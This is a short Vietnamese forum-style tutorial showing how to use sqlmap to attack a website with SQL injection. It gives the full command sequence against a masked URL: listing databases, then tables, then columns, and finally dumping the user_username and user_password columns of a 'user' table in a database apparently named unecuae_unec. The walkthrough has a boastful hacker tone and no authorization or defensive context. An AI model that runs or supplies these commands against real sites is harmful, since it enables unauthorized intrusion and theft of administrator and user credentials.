Bạn
có thể dùng công cụ SQLMAP có sẵn trên Backtrack hoặc Kali. Đây là một
trong những kỹ năng mà bất cứ ai hoạt động trong lĩnh vực security cũng
phải biết.
VD: ta có 1 site như này http://www.xxxxxxxx.com/about.php?id=1
Giờ khởi động SQL bằng cách đánh lệnh (-h hoặc --help) vào cửa sổ console
Mã:
# sqlmap --help
Để xem được database ta dùng lệnh sau
Mã:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 --dbs-u = đường dẫn url
--dbs = Liệt kê databases
Theo cái hình chình ình ở trên thì chúng ta thấy được " unecuae_unec " cái này là cái gì thì tôi ko cần nói nữa há
Giờ chúng ta tiếp tục với lệnh :
Mã:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec --tables-D = DBMS liệt kê dữ liệu
--tables = liệt kê cái gì thì các bạn tự tìm hiểu hén.....
Sau khi tìm thấy 1 số " bảng tuần hoàn hóa học " chúng ta tiếp tục dụng lệnh để show hàng ra
Mã:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user --columns-T = DBMS lệnh lệt kê dữ liệu
--columns = liệt kê cái gì thì các bạn tự tìm hiểu hén.....
Đến đây là bạn đã có thể soi được quần chíp của bợn admin rầu đó
Mã:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user -C user_username,user_password --dump
Câu chuyện của tôi đến đây là hết rồi....
